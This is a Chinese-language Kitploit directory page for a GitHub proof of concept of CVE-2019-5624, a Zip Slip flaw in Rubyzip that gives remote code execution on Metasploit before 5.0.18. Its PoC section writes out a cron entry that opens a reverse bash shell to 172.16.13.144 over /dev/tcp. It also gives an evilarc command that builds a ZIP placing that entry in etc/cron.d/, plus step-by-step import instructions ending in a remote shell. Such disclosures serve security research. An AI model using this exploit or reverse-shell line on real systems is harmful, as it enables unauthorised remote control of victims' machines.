Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-5624 — 针对Metasploit的CVE-2019-5624漏洞(Rubyzip不安全的ZIP处理导致RCE)的概念验证 | Kitploit
工具/GitHubGitHub/voidsec/cve-2019-5624
漏洞利用框架漏洞分析漏洞利用Web应用程序漏洞利用渗透测试Payload 开发
GitHubvoidsec/cve-2019-5624

CVE-2019-5624

针对Metasploit的CVE-2019-5624漏洞(Rubyzip不安全的ZIP处理导致RCE)的概念验证

查看仓库
13537年前尚未审核
网站

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-5624

Metasploit 的 CVE-2019-5624 漏洞的概念验证 (Rubyzip 不安全的 ZIP 处理导致远程代码执行)

介绍

2019年2月,我在 Rubyzip 库中发现了一个新漏洞。它允许攻击者利用不安全的 ZIP 处理(Zip Slip)导致远程命令执行。

该漏洞被用于攻击所有低于5.0.18版本的Metasploit(见Metasploit Wrap-Up)

我写了一篇详细的博客文章解释了该漏洞。

概念验证 (POC)

  • 创建包含以下内容的文件:
root@kitploit:~
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
  • 生成包含路径遍历载荷的 ZIP 压缩包:
root@kitploit:~
python evilarc.py exploit --os unix -p etc/cron.d/
  • 向ZIP文件中添加一个有效的MSF工作区(以便Metasploit能够提取它,否则它将拒绝处理该ZIP压缩包)
  • 设置两个监听器,一个在4444端口,另一个在4445端口(4445端口上的监听器将获得反向Shell)
  • 登录MSF Web界面
  • 创建一个新“项目”
  • 选择“导入”、“从文件”,选择恶意ZIP文件,最后点击“导入”按钮
  • 等待导入过程完成
  • 享受你的反弹Shell

视频

下载工具